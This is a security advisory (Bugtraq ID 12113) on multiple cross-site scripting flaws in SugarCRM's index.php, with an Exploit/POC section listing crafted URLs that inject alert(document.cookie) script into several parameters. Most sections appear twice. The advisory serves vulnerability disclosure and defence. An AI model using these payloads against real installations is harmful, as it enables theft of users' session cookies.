SugarCRM Multiple Cross-Site Scripting Vulnerability
BID:12113
Info
SugarCRM Multiple Cross-Site Scripting Vulnerability
| Bugtraq ID: | 12113 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 26 2004 12:00AM |
| Updated: | Dec 26 2004 12:00AM |
| Credit: | Discovery is credited to Joxean Koret. |
| Vulnerable: |
SugarCRM SugarCRM 2.0.1 a SugarCRM SugarCRM 2.0.1 SugarCRM SugarCRM 1.5 d SugarCRM SugarCRM 1.1 f SugarCRM SugarCRM 1.1 e SugarCRM SugarCRM 1.1 d SugarCRM SugarCRM 1.1 c SugarCRM SugarCRM 1.1 b SugarCRM SugarCRM 1.1 a SugarCRM SugarCRM 1.1 SugarCRM SugarCRM 1.0 g SugarCRM SugarCRM 1.0 f SugarCRM SugarCRM 1.0 |
| Not Vulnerable: | |
Discussion
SugarCRM Multiple Cross-Site Scripting Vulnerability
SugarCRM is prone to multiple cross-site scripting vulnerabilities. These issues are exposed through various URI parameters of the 'index.php' script. The affected parameters are not adequately sanitized of HTML and script code before being output into dynamically generated pages.
An attacker could exploit these issues by enticing a victim user into following a malicious link that contains hostile HTML and script code. This could be exploited to steal cookie-based authentication credentials.
The discoverer of these issues stated that some of the issues could theoretically allow for execution of arbitrary PHP code, though has not provided further information as to how this is possible.
SugarCRM is prone to multiple cross-site scripting vulnerabilities. These issues are exposed through various URI parameters of the 'index.php' script. The affected parameters are not adequately sanitized of HTML and script code before being output into dynamically generated pages.
An attacker could exploit these issues by enticing a victim user into following a malicious link that contains hostile HTML and script code. This could be exploited to steal cookie-based authentication credentials.
The discoverer of these issues stated that some of the issues could theoretically allow for execution of arbitrary PHP code, though has not provided further information as to how this is possible.
Exploit / POC
SugarCRM Multiple Cross-Site Scripting Vulnerability
The following examples were provided:
http://www.example.com/sugarcrm/index.php?module=Contacts&action=EditView&return_module="><script>alert(document.cookie)</scrip
+t>&return_action=index
http://www.example.com/sugarcrm/index.php?module=Contacts&action=EditView&return_module=&return_action="><script>alert(document.co
+okie)</script>
http://www.example.com/sugarcrm/index.php?name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&address_city=&website=&phone=
+&action=ListView&query=true&module=Accounts&button=Search
http://www.example.com/sugarcrm/index.php?action=DetailView&module=Accounts"><script>alert(document.cookie)</script>&record=
+d676f046-1be5-dc36-114e-4138f972bf5d
http://www.example.com/sugarcrm/index.php?action=DetailView&module=Accounts''''&record=[RECORD
ID]"><script>alert(document.cookie)</script>
The following examples were provided:
http://www.example.com/sugarcrm/index.php?module=Contacts&action=EditView&return_module="><script>alert(document.cookie)</scrip
+t>&return_action=index
http://www.example.com/sugarcrm/index.php?module=Contacts&action=EditView&return_module=&return_action="><script>alert(document.co
+okie)</script>
http://www.example.com/sugarcrm/index.php?name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&address_city=&website=&phone=
+&action=ListView&query=true&module=Accounts&button=Search
http://www.example.com/sugarcrm/index.php?action=DetailView&module=Accounts"><script>alert(document.cookie)</script>&record=
+d676f046-1be5-dc36-114e-4138f972bf5d
http://www.example.com/sugarcrm/index.php?action=DetailView&module=Accounts''''&record=[RECORD
ID]"><script>alert(document.cookie)</script>
Solution / Fix
SugarCRM Multiple Cross-Site Scripting Vulnerability
Solution:
The vendor has reportedly released a new version to address these issues. This has not been confirmed by Symantec. Users should contact the vendor for more information.
---
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
The vendor has reportedly released a new version to address these issues. This has not been confirmed by Symantec. Users should contact the vendor for more information.
---
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.